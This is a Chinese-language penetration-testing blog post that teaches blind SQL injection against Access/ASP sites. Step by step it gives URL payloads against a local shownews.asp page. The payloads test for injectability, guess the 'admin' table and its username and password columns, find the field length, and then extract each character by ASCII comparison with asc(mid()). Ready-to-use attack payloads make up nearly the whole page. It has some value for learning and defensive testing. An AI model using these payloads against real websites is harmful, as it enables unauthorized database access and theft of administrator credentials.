欢迎来到【血梦博客】 今天是:2021年04月14日 星期三
站长联系QQ:635948183
当前位置: 网站首页> 渗透测试> WEB安全之SQL注入:access+asp 逐字猜解法

WEB安全之SQL注入:access+asp 逐字猜解法

作者:血梦 日期:2020-03-17 浏览:283分类: 渗透测试 已提交百度收录

WEB安全第四章SQL注入篇02 access+asp 逐字猜解法

1、判断注入

and 1=1

and 1=2

2、猜表

页面返回正常 说明 表存在

http://127.0.0.1:99/shownews.asp?id=110 and exists (select * from admin)

3、猜列

http://127.0.0.1:99/shownews.asp?id=110 and exists (select username from admin)

http://127.0.0.1:99/shownews.asp?id=110 and exists (select password from admin)

4、猜数据长度

查询字段的长度

http://127.0.0.1:99/shownews.asp?id=110 and (select top 1 len(username) from admin)=8

等于8就是确定数据的长度 也可以使用大于(>)小于(<)个人认为 等于(=)最好确定长度

查询数据asccii码

mid() 截取位置
asc() ascii码

第一个长度的ascii码长度 页面返回正常

http://127.0.0.1:99/shownews.asp?id=110 and (select top 1 asc(mid(username,1,1)) from admin)=97

http://127.0.0.1:99/shownews.asp?id=110 and (select top 1 asc(mid(username,2,1)) from admin)=100

http://127.0.0.1:99/shownews.asp?id=110 and (select top 1 asc(mid(password,1,1)) from admin)=100

猜解完之后 把ascii码 转换过来 并接 就是username字段的的数据,其他字段也是这样。

97的字符为 a 100的字符为d 并接起来就是ad

关灯